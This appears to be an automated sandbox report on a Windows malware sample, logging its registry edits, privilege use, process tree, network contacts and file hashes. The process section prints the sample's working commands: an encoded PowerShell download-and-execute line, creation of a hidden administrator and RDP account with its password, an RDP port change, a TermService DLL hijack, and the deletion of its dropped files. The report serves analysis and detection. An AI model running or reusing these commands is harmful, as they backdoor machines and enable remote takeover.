Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2652 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2652 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3584 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1076 wrote to memory of 1412 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1076 wrote to memory of 1412 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3584 wrote to memory of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 1180 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 1180 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 2568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 2568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3584 wrote to memory of 1180 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 3584 wrote to memory of 1180 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1180 wrote to memory of 1848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1180 wrote to memory of 1848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3584 wrote to memory of 2784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3584 wrote to memory of 2784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2784 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2784 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1192 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4088 wrote to memory of 3104 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4088 wrote to memory of 3104 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3584 wrote to memory of 2800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3584 wrote to memory of 2800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 1096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 1096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1096 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1096 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2604 wrote to memory of 984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2604 wrote to memory of 984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 896 wrote to memory of 1880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 896 wrote to memory of 1880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1880 wrote to memory of 1740 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1880 wrote to memory of 1740 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3244 wrote to memory of 3848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3244 wrote to memory of 3848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3848 wrote to memory of 352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3848 wrote to memory of 352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1272 wrote to memory of 852 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1272 wrote to memory of 852 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 852 wrote to memory of 1816 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 852 wrote to memory of 1816 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3980 wrote to memory of 1308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3980 wrote to memory of 1308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1432 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1432 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3704 wrote to memory of 3332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3704 wrote to memory of 3332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3332 wrote to memory of 3752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3332 wrote to memory of 3752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2256 wrote to memory of 1756 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2256 wrote to memory of 1756 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1756 wrote to memory of 1736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1756 wrote to memory of 1736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2352 wrote to memory of 1568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2352 wrote to memory of 1568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lgm3nitg\lgm3nitg.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA08B.tmp" "c:\Users\Admin\AppData\Local\Temp\lgm3nitg\CSC9212ECC7539C4C0BA0BEA2E086131CD.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc w6OkGKLL /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc w6OkGKLL /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc w6OkGKLL /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc w6OkGKLL

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc w6OkGKLL

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc w6OkGKLL

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.speedtest.net udp
US 151.101.2.219:80 www.speedtest.net tcp
US 151.101.2.219:443 www.speedtest.net tcp
US 151.101.2.219:80 www.speedtest.net tcp
US 8.8.8.8:53 c.speedtest.net udp
US 151.101.2.219:443 c.speedtest.net tcp
US 8.8.8.8:53 speednld.phoenixnap.com udp
NL 185.56.137.2:8080 speednld.phoenixnap.com tcp
US 8.8.8.8:53 speedtest2.usenet.farm udp
NL 178.20.174.136:8080 speedtest2.usenet.farm tcp
US 8.8.8.8:53 speedtest.xsnews.nl udp
NL 91.223.220.109:8080 speedtest.xsnews.nl tcp
US 8.8.8.8:53 speedtest.hyperfilter.com udp
NL 185.30.167.247:8080 speedtest.hyperfilter.com tcp
US 8.8.8.8:53 zuvujvhuaif.xyz udp
MD 185.163.45.186:443 zuvujvhuaif.xyz tcp

Files

memory/2652-115-0x00000171FED90000-0x00000171FF18F000-memory.dmp

memory/2652-118-0x00000171FE973000-0x00000171FE975000-memory.dmp

memory/2652-117-0x00000171FE970000-0x00000171FE972000-memory.dmp

memory/2652-119-0x00000171FE975000-0x00000171FE976000-memory.dmp

memory/2652-120-0x00000171FE976000-0x00000171FE977000-memory.dmp

memory/3584-121-0x0000000000000000-mapping.dmp

memory/3584-126-0x00000260257D0000-0x00000260257D1000-memory.dmp

memory/3584-129-0x000002603DB00000-0x000002603DB01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/1076-135-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\lgm3nitg\lgm3nitg.cmdline

MD5 6724c7d45d268192f7909bfd5cba7678
SHA1 c262d47aba13cdd1445fbbab33f31a8cee9f9d4a
SHA256 27ccc2d43665f61d8b041e2bf026a5df42da0273b3ef031b496188f83e012eff
SHA512 1986846c600ff2b8bd5fde32d997edd07dc17581b202e7d130220969d4ff9b0755758a7912c2fd268df08a64d6321decfaa68f047e6413ae148dfbb97bd7a6e6

\??\c:\Users\Admin\AppData\Local\Temp\lgm3nitg\lgm3nitg.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/3584-139-0x00000260256F3000-0x00000260256F5000-memory.dmp

memory/3584-138-0x00000260256F0000-0x00000260256F2000-memory.dmp

memory/3584-140-0x00000260256F6000-0x00000260256F8000-memory.dmp

memory/1412-141-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\lgm3nitg\CSC9212ECC7539C4C0BA0BEA2E086131CD.TMP

MD5 59016e2dd4463ec4b4403558df109527
SHA1 199b052d69e7ba6b037c88db9020b689c89d5aa5
SHA256 457cbe18863e13a4b79644b165d91f3d612901e8accdb9f7c5fef83b2b131e9c
SHA512 7d4edd20eee5af9ecb6b7317765c7f95b954342d52c302e668539d943ce32fff21c82296b3e20822ae4bca4c41ca54014c2fc554dc3cb2bda2f83d6d6337c70b

C:\Users\Admin\AppData\Local\Temp\RESA08B.tmp

